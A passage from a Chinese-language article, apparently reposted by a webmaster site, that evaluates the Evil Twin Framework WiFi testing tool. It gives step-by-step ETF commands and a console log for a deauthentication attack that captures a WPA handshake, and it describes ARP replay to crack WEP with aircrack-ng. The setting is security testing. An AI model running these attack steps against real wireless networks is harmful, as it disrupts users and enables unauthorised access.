| 
                         ETF 启用了 AirScanner 模块并分析 IEEE 802.11 数据帧来发现 WPA 握手包。然后 AirInjecto 就可以使用解除认证攻击来强制客户端断开连接,以进行重连。必须在 ETF 上执行下面这些步骤才能完成上面的目标: 
    - 进入 AirScanner 配置模式:config airscanner
 
    - 设置 AirScanner 不跳信道:config airscanner
 
    - 设置信道以嗅探经过 WiFi 接入点信道的数据(APC):set fixed_sniffing_channel = <APC>
 
    - 使用 CredentialSniffer 插件来启动 AirScanner 模块:start airscanner with credentialsniffer
 
    - 从已嗅探的接入点列表中添加目标接入点的 BSSID(APS):add aps where ssid = <APS>
 
    - 启用 AirInjector 模块,在默认情况下,它会启用解除认证攻击:start airinjector
 
 
这些简单的命令设置能让 ETF 在每次测试时执行成功且有效的解除认证攻击。ETF 也能在每次测试的时候捕获 WPA 的握手数据包。下面的代码能让我们看到 ETF 成功的执行情况。 
- ███████╗████████╗███████╗ 
 - ██╔════╝╚══██╔══╝██╔════╝ 
 - █████╗ ██║ █████╗ 
 - ██╔══╝ ██║ ██╔══╝ 
 - ███████╗ ██║ ██║ 
 - ╚══════╝ ╚═╝ ╚═╝ 
 - [+] Do you want to load an older session? [Y/n]: n 
 - [+] Creating new temporary session on 02/08/2018 
 - [+] Enter the desired session name: 
 - ETF[etf/aircommunicator/]::> config airscanner 
 - ETF[etf/aircommunicator/airscanner]::> listargs 
 - sniffing_interface = wlan1; (var) 
 - probes = True; (var) 
 - beacons = True; (var) 
 - hop_channels = false; (var) 
 - fixed_sniffing_channel = 11; (var) 
 - ETF[etf/aircommunicator/airscanner]::> start airscanner with 
 - arpreplayer caffelatte credentialsniffer packetlogger selfishwifi 
 - ETF[etf/aircommunicator/airscanner]::> start airscanner with credentialsniffer 
 - [+] Successfully added credentialsniffer plugin. 
 - [+] Starting packet sniffer on interface 'wlan1' 
 - [+] Set fixed channel to 11 
 - ETF[etf/aircommunicator/airscanner]::> add aps where ssid = CrackWPA 
 - ETF[etf/aircommunicator/airscanner]::> start airinjector 
 - ETF[etf/aircommunicator/airscanner]::> [+] Starting deauthentication attack 
 - - 1000 bursts of 1 packets 
 - - 1 different packets 
 - [+] Injection attacks finished executing. 
 - [+] Starting post injection methods 
 - [+] Post injection methods finished 
 - [+] WPA Handshake found for client '70:3e:ac:bb:78:64' and network 'CrackWPA' 
 
  
使用 ARP 重放攻击并破解 WEP 无线网络 
下面这个场景(图 3)将关注 地址解析协议 (ARP)重放攻击的效率和捕获包含初始化向量(IVs)的 WEP 数据包的速度。相同的网络可能需要破解不同数量的捕获的 IVs,所以这个场景的 IVs 上限是 50000。如果这个网络在首次测试期间,还未捕获到 50000 IVs 就崩溃了,那么实际捕获到的 IVs 数量会成为这个网络在接下来的测试里的新的上限。我们使用 aircrack-ng 对数据包进行破解。 
测试场景从一个使用 WEP 协议进行加密的 WiFi 接入点和一台知道其密钥的离线客户端设备开始 —— 为了测试方便,密钥使用了 12345,但它可以是更长且更复杂的密钥。一旦客户端连接到了 WEP 接入点,它会发送一个不必要的 ARP 数据包;这是要捕获和重放的数据包。一旦被捕获的包含 IVs 的数据包数量达到了设置的上限,测试就结束了。 
图 3:在进行解除认证攻击后捕获 WPA 握手包的场景 
ETF 使用 Python 的 Scapy 库来进行包嗅探和包注入。为了最大限度地解决 Scapy 里的已知的性能问题,ETF 微调了一些低级库,来大大加快包注入的速度。对于这个特定的场景,ETF 为了更有效率地嗅探,使用了 tcpdump 作为后台进程而不是 Scapy,Scapy 用于识别加密的 ARP 数据包。                         (编辑:泰州站长网) 
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! 
                     |